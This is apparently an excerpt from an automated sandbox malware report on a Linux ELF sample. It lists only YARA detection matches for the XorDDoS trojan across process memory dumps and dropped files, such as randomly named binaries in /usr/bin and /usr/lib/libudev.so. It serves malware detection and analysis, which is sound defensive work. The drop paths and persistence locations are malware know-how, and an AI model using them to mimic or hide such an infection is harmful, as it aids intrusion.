            Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/sosfbbrzmx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/sosfbbrzmx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/sosfbbrzmx, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/uhjkqkcgma, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/uhjkqkcgma, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/uhjkqkcgma, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/vnihfmehfy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/vnihfmehfy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/vnihfmehfy, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/oigyzaiygp, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/oigyzaiygp, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/oigyzaiygp, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/otlzwyqefc, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/otlzwyqefc, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/otlzwyqefc, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/ksagqhmoao, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/ksagqhmoao, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/eqoogeqyds, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/eqoogeqyds, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/ksagqhmoao, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/eqoogeqyds, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/wutujskjnm, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/wutujskjnm, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/wutujskjnm, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/qxzsiorokf, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/qxzsiorokf, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/qxzsiorokf, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/gphlkawhxw, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/gphlkawhxw, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/gphlkawhxw, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/uzqdvpyngy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/uzqdvpyngy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/uzqdvpyngy, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/snluqxjnyb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/snluqxjnyb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/jeyjdycnpv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/jeyjdycnpv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/jeyjdycnpv, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/bgoiqqymph, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/bgoiqqymph, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/bgoiqqymph, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/dthtwwmqvu, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/dthtwwmqvu, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/dthtwwmqvu, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: UDMp3dZ7nc.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: UDMp3dZ7nc.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: UDMp3dZ7nc.elf, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
